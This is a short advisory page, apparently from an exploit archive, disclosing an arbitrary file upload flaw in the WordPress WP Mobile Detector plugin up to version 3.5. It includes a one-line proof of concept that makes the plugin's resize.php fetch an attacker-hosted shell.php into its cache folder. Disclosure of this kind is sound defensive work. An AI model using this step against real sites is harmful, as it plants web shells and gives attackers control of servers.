WordPress WP Mobile Detector 3.5 Shell Upload *youtube

**WordPress WP Mobile Detector 3.5 Shell Upload *youtube**

2016.06.05

Credit: Aaditya Purani

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

Hello,
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .Even Sucuri
has published one advisory on it.
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to [wordpress site
path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to
your shell.php]
and it will get saved in directory
/wp-content/plugins/wp-mobile-detector/cache/shell.php
Warm Regards,
Aaditya Purani

References:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/

https://www.youtube.com/watch?v=ULE1AVWfHTU

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress WP Mobile Detector 3.5 Shell Upload *youtube

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

**WordPress WP Mobile Detector 3.5 Shell Upload *youtube**

Thanks for you comment!
Your message is in quarantine 48 hours.